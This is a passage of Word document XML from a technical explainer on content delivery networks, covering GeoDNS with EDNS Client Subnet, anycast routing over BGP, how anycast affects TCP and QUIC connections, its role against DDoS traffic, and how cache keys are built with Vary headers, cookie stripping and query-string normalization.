      <w:r w:rsidRPr="00784ED6">
        <w:t>Client's resolver queries CDN's authoritative nameserver for example.cdn-provider.net.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DCD303" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1204"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN's nameserver inspects the </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>resolver's IP address</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> and maps it to a geographic region.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06981294" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1204"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Returns the IP of the nearest PoP with a short TTL (30–300 seconds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130D6E3E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1204"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Client connects to that IP — the nearest CDN edge node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054AF607" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The EDNS Client Subnet (ECS) precision improvement:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CD122F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>GeoDNS based on resolver IP fails when clients use geographically remote resolvers (Google 8.8.8.8, Cloudflare 1.1.1.1). A user in Tokyo using Google's resolver may get a Singapore PoP IP because Google's nearest resolver is in Singapore.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013F4BED" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>ECS (RFC 7871) embeds the client's /24 subnet in the DNS query itself:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74507512" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA839A9" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>DNS query includes: client_subnet = 103.5.140.0/24  (Tokyo address block)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B8F304" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN nameserver returns: Tokyo PoP IP — regardless of resolver location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574FCC80" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Accuracy dramatically improves. Privacy trade-off: the CDN's authoritative server learns the client's approximate location on every DNS query.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B65217E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Short TTL implications:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C2B431" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN DNS responses use short TTLs (30–300 seconds) to enable dynamic routing — if a PoP fails, updated DNS responses route to healthy PoPs within one TTL duration. But short TTLs increase DNS query load on CDN nameservers (every client re-resolves every TTL expiry) and add DNS resolution latency to connection establishment. The TTL is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>traffic management dial</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> — shorter enables faster failover, longer reduces DNS overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05879857" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anycast Routing — IP-Level Traffic Distribution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEC0198" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anycast</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> advertises the </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>same IP address from multiple geographic locations simultaneously</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> via BGP. Internet routing directs packets to the topologically nearest location advertising that IP — automatically, without DNS involvement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220602B5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How Anycast works internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA28F1A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0658BEE0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN advertises 203.0.113.0/24 from:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159F5678" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  PoP in Tokyo   → BGP peers in Asia receive this route</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC4EAD3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  PoP in Frankfurt → BGP peers in Europe receive this route</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49716117" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  PoP in Ashburn  → BGP peers in Americas receive this route</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA6914A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="1A2086DF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>A packet to 203.0.113.1 from Tokyo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE2DB52" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Tokyo ISP's router has a route to 203.0.113.0/24 via Tokyo PoP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5604CF79" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Packet goes to Tokyo PoP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11984A5F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="1A69EA31" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Same packet from London:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4A1ECF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  London ISP's router has a route to 203.0.113.0/24 via Frankfurt PoP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728CD033" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Packet goes to Frankfurt PoP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1C2F0A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="17454583" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Same IP. Different physical destinations. Transparent to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578872E1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BGP route propagation mechanics:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ABF5BC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Each PoP connects to its upstream ISPs and internet exchanges via BGP. The PoP announces 203.0.113.0/24. Each upstream provider propagates the announcement to their peers. Within BGP convergence time (minutes for global propagation), all routers on the internet have paths to 203.0.113.0/24 — each choosing the path with the best BGP attributes (shortest AS path, local preference, lowest MED).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FEF886" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anycast and TCP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B91149B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>TCP connections are identified by their 4-tuple (src_ip, src_port, dst_ip, dst_port). Once a TCP connection is established to an Anycast IP, all packets of that connection must reach the </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>same physical PoP</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> — otherwise the PoP receiving later packets has no connection state for them and resets the connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D055AD" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>BGP routing is </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>flow-stable</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> — the same 4-tuple consistently routes to the same PoP because the routing path doesn't change on a per-packet basis. But routing </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> change if BGP paths update (PoP failure, link failure) — which breaks existing TCP connections routed through the affected path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E739FBF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>QUIC and Anycast:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C42A51" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>QUIC connections are identified by a </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connection ID</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> — a random token chosen by the client. Packets are routed based on IP destination (the Anycast IP), not the connection state. When a routing change directs packets to a different PoP, the new PoP doesn't have the connection state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04984DA8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E7CC8B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1205"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Consistent hashing on Connection ID:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Route packets to PoPs based on a hash of the Connection ID. Same Connection ID → same PoP, regardless of routing changes. Implemented at a layer-4 load balancer in front of the PoP cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149ED846" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1205"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Connection state sharing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> PoPs in the same cluster share QUIC connection state via a distributed cache. Any PoP can handle any packet by looking up the connection state. High complexity and latency overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDBBEDC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anycast for DDoS mitigation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0535D811" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>A 1Tbps DDoS attack against an Anycast IP is automatically distributed across all PoPs advertising that IP. If Cloudflare has 100 PoPs advertising the same Anycast IP, each PoP receives approximately 10Gbps — manageable individually, devastating if concentrated at a single point. This is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>architectural DDoS defense</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> that makes large CDNs effectively immune to volumetric attacks: the aggregate capacity (100+ Tbps for the largest CDNs) exceeds any feasible attack volume.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAEA4FE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:pict w14:anchorId="7ED78C74">
          <v:rect id="_x0000_i4552" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFC938B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. CDN Caching — The Deep Internal Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B50B4C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Cache Key — Foundation of Correctness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477F273E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>The cache key determines whether two requests are for the same cacheable resource. Getting it wrong causes either </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>correctness failures</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> (serving wrong content to users) or </w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>efficiency failures</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> (too many cache entries, poor hit rates).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74115E0C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Default cache key:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> scheme + host + path + query_string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5951DB1C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The cache key extension problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344F989D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>The same URL can legitimately return different responses based on request headers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9E97E6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B363CBB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>GET /api/products HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC49440" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Accept-Encoding: gzip          → compressed response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32780536" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Accept-Language: fr-FR         → French content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416CB7AB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Cookie: user=alice; theme=dark → personalized dark mode response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CEE6CD" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>The HTTP Vary response header declares which request headers affect the response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56790B7B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBA52B0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>HTTP/1.1 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13031517" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Vary: Accept-Encoding, Accept-Language</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784CBD3D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>The CDN extends the cache key to include those header values:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3304BB9B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579DF942" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>cache_key = URL + normalize(Accept-Encoding) + normalize(Accept-Language)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62702B8C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Vary header pathologies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04437A25" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Vary: Cookie means the response varies per unique cookie combination. Since cookies contain session IDs, user IDs, and preferences — each user has a unique cookie — this creates one cache entry per user. The CDN becomes a pass-through proxy with a cache that's always cold. CDNs handle this by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB1A094" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1206"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cookie stripping:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Remove non-content-affecting cookies (_ga, _fbp, utm_*, __cfduid) before computing the cache key and before forwarding to origin. Only cookies that actually change the response (user locale preference, authenticated user ID) remain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586A1E03" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1206"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cookie normalization:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Hash the relevant cookie fields to create a normalized cache dimension instead of using the raw cookie string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0E4788" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1206"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Surrogate keys / cache tags:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> Rather than relying on Vary, use a separate content-addressed keying scheme (discussed later).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DB2292" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Query string normalization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C9FFC0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6531E0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>/search?q=coffee&amp;sort=price&amp;page=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E37695E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>/search?page=1&amp;q=coffee&amp;sort=price</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED212E4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>/search?q=coffee&amp;sort=price&amp;page=1&amp;utm_source=email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2B8333" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>All three URLs are logically identical but have different string representations. Without normalization, each is a separate cache entry. CDN cache key normalization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C553B95" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
